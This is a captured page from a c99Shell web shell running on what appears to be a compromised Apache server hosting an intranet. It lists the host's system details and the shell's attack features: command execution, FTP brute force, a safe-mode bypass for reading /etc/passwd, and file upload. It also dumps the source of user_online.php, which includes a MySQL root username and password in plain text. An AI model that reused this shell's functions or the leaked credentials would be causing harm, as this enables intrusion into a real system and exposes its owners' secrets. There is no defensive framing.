110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/intranet/ drwxrwxrwx Free 52.63 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/intranet/ drwxrwxrwx
Free 52.63 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: user_online.php (1.37 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/intranet/user_online.php
Size	1.37 KB
MD5	3bfd6cfc0fbea77c0008b783b3d8f25b
Owner/Group	root/root
Perms	-rw-r--r--
Create time	06/07/2011 01:41:54
Access time	11/07/2024 11:40:52
MODIFY time	19/08/2010 11:35:56

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528
00000540
00000558
00000570

3C 68 74 6D 6C 3E 0D 0A 3C 68 65 61 64 3E 0D 0A 3C 6D 65 74 61 20 68 74
74 70 2D 65 71 75 69 76 3D 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20
63 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D 6C 3B 20 63 68 61 72
73 65 74 3D 77 69 6E 64 6F 77 73 2D 38 37 34 22 3E 0D 0A 3C 6C 69 6E 6B
20 68 72 65 66 3D 22 73 74 79 6C 65 2E 63 73 73 22 20 72 65 6C 3D 22 73
74 79 6C 65 73 68 65 65 74 22 20 74 79 70 65 3D 22 74 65 78 74 2F 63 73
73 22 3E 0D 0A 3C 74 69 74 6C 65 3E 2D 3D 3D 20 3A 20 C2 D4 B9 B4 D5 B5
E9 CD B9 C3 D1 BA C3 D0 BA BA 20 49 6E 74 72 61 6E 65 74 20 42 43 4E 55
20 3A 20 3D 3D 2D 3C 2F 74 69 74 6C 65 3E 0D 0A 3C 2F 68 65 61 64 3E 0D
0A 0D 0A 3C 3F 70 68 70 0D 0A 24 53 65 73 73 69 6F 6E 5F 6E 61 6D 65 20
3D 20 22 64 65 66 61 75 6C 74 22 3B 20 0D 0A 24 68 6F 73 74 20 3D 20 22
6C 6F 63 61 6C 68 6F 73 74 22 3B 20 0D 0A 24 75 73 65 72 6E 61 6D 65 20
3D 20 22 72 6F 6F 74 22 3B 20 0D 0A 24 70 61 73 73 77 6F 72 64 20 3D 20
22 40 31 34 30 31 32 35 31 38 22 3B 20 0D 0A 24 64 61 74 61 62 61 73 65
20 3D 20 22 69 6E 74 72 61 6E 65 74 22 3B 20 0D 0A 24 74 61 62 6C 65 20
3D 20 22 75 73 65 72 6F 6E 6C 69 6E 65 22 3B 0D 0A 0D 0A 69 66 20 28 24
53 65 73 73 69 6F 6E 5F 6E 61 6D 65 20 3D 3D 20 22 64 65 66 61 75 6C 74
22 29 20 7B 0D 0A 73 65 73 73 69 6F 6E 5F 73 74 61 72 74 28 29 3B 0D 0A
7D 0D 0A 65 6C 73 65 20 7B 0D 0A 73 65 73 73 69 6F 6E 5F 6E 61 6D 65 28
22 24 53 65 73 73 69 6F 6E 5F 6E 61 6D 65 22 29 3B 0D 0A 73 65 73 73 69
6F 6E 5F 73 74 61 72 74 28 22 24 53 65 73 73 69 6F 6E 5F 6E 61 6D 65 22
29 3B 0D 0A 7D 0D 0A 0D 0A 24 53 49 44 20 3D 20 73 65 73 73 69 6F 6E 5F
69 64 28 29 3B 0D 0A 24 74 69 6D 65 20 3D 20 74 69 6D 65 28 29 3B 0D 0A
24 64 61 67 20 3D 20 64 61 74 65 28 22 7A 22 29 3B 0D 0A 24 6E 75 20 3D
20 74 69 6D 65 28 29 2D 39 30 30 3B 20 2F 2F 20 4B 65 65 70 20 66 6F 72
20 31 35 20 6D 69 6E 73 0D 0A 0D 0A 0D 0A 6D 79 73 71 6C 5F 63 6F 6E 6E
65 63 74 20 28 24 68 6F 73 74 2C 20 24 75 73 65 72 6E 61 6D 65 2C 20 24
70 61 73 73 77 6F 72 64 29 20 4F 52 20 44 49 45 20 28 22 43 6F 75 6C 64
20 6E 6F 74 20 63 6F 6E 6E 65 63 74 20 74 6F 20 4D 79 53 51 4C 22 29 3B
0D 0A 6D 79 73 71 6C 5F 73 65 6C 65 63 74 5F 64 62 28 24 64 61 74 61 62
61 73 65 29 20 4F 52 20 44 49 45 20 28 22 43 61 6E 27 74 20 73 65 6C 65
63 74 20 64 61 74 61 62 61 73 65 2E 22 29 3B 0D 0A 0D 0A 0D 0A 24 73 69
64 63 68 65 63 6B 20 3D 20 6D 79 73 71 6C 5F 71 75 65 72 79 28 22 53 45
4C 45 43 54 20 63 6F 75 6E 74 28 2A 29 20 46 52 4F 4D 20 24 74 61 62 6C
65 20 57 48 45 52 45 20 53 49 44 3D 27 24 53 49 44 27 22 29 3B 0D 0A 24
73 69 64 5F 63 68 65 63 6B 20 3D 20 6D 79 73 71 6C 5F 72 65 73 75 6C 74
28 24 73 69 64 63 68 65 63 6B 2C 30 29 3B 0D 0A 0D 0A 69 66 20 28 24 73
69 64 5F 63 68 65 63 6B 20 3D 3D 20 22 30 22 29 20 7B 0D 0A 0D 0A 6D 79
73 71 6C 5F 71 75 65 72 79 28 22 49 4E 53 45 52 54 20 49 4E 54 4F 20 24
74 61 62 6C 65 20 56 41 4C 55 45 53 20 28 27 24 53 49 44 27 2C 27 24 74
69 6D 65 27 2C 27 24 64 61 67 27 29 22 29 3B 20 0D 0A 7D 20 65 6C 73 65
20 7B 20 0D 0A 0D 0A 6D 79 73 71 6C 5F 71 75 65 72 79 28 22 55 50 44 41
54 45 20 24 74 61 62 6C 65 20 53 45 54 20 74 69 6D 65 3D 27 24 74 69 6D
65 27 20 57 48 45 52 45 20 53 49 44 3D 27 24 53 49 44 27 22 29 3B 20 0D
0A 7D 0D 0A 0D 0A 0D 0A 24 63 6F 75 6E 74 5F 75 73 65 72 73 20 3D 20 6D
79 73 71 6C 5F 71 75 65 72 79 28 22 53 45 4C 45 43 54 20 63 6F 75 6E 74
28 2A 29 20 46 52 4F 4D 20 24 74 61 62 6C 65 20 57 48 45 52 45 20 74 69
6D 65 3E 24 6E 75 20 41 4E 44 20 64 61 79 3D 24 64 61 67 22 29 3B 0D 0A
24 75 73 65 72 73 5F 6F 6E 6C 69 6E 65 20 3D 20 6D 79 73 71 6C 5F 72 65
73 75 6C 74 28 24 63 6F 75 6E 74 5F 75 73 65 72 73 2C 30 29 3B 0D 0A 65
63 68 6F 20 24 75 73 65 72 73 5F 6F 6E 6C 69 6E 65 3B 20 2F 2F 20 65 63
68 6F 20 A8 D3 B9 C7 B9 BC D9 E9 20 6F 6E 6C 69 6E 65 20 CD CD A1 C1 D2
A1 0D 0A 0D 0A 0D 0A 6D 79 73 71 6C 5F 71 75 65 72 79 28 22 44 45 4C 45
54 45 20 46 52 4F 4D 20 24 74 61 62 6C 65 20 57 48 45 52 45 20 74 69 6D
65 3C 24 6E 75 22 29 3B 0D 0A 6D 79 73 71 6C 5F 71 75 65 72 79 28 22 44
45 4C 45 54 45 20 46 52 4F 4D 20 24 74 61 62 6C 65 20 57 48 45 52 45 20
64 61 79 20 21 3D 20 24 64 61 67 22 29 3B 0D 0A 0D 0A 6D 79 73 71 6C 5F
63 6C 6F 73 65 28 29 3B 0D 0A 0D 0A 3F 3E 0D 0A 3C 2F 62 6F 64 79 3E 0D
0A 3C 2F 68 74 6D 6C 3E 0D 0A 0D 0A

<html>  <head>  <meta ht
tp-equiv="Content-Type"
content="text/html; char
set=windows-874">  <link
href="style.css" rel="s
tylesheet" type="text/cs
s">  <title>-== : ВФ№ґХµ
йН№ГСєГРєє Intranet BCNU
: ==-</title>  </head>
   <?php  $Session_name
= "default";   $host = "
localhost";   $username
= "root";   $password =
"@14012518";   $database
= "intranet";   $table
= "useronline";    if ($
Session_name == "default
") {  session_start();
}  else {  session_name(
"$Session_name");  sessi
on_start("$Session_name"
);  }    $SID = session_
id();  $time = time();
$dag = date("z");  $nu =
time()-900; // Keep for
15 mins      mysql_conn
ect ($host, $username, $
password) OR DIE ("Could
not connect to MySQL");
  mysql_select_db($datab
ase) OR DIE ("Can't sele
ct database.");      $si
dcheck = mysql_query("SE
LECT count(*) FROM $tabl
e WHERE SID='$SID'");  $
sid_check = mysql_result
($sidcheck,0);    if ($s
id_check == "0") {    my
sql_query("INSERT INTO $
table VALUES ('$SID','$t
ime','$dag')");   } else
{     mysql_query("UPDA
TE $table SET time='$tim
e' WHERE SID='$SID'");
}      $count_users = m
ysql_query("SELECT count
(*) FROM $table WHERE ti
me>$nu AND day=$dag");
$users_online = mysql_re
sult($count_users,0);  e
cho $users_online; // ec
ho ЁУ№З№јЩй online ННЎБТ
Ў      mysql_query("DELE
TE FROM $table WHERE tim
e<$nu");  mysql_query("D
ELETE FROM $table WHERE
day != $dag");    mysql_
close();    ?>  </body>
</html>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0136 ]--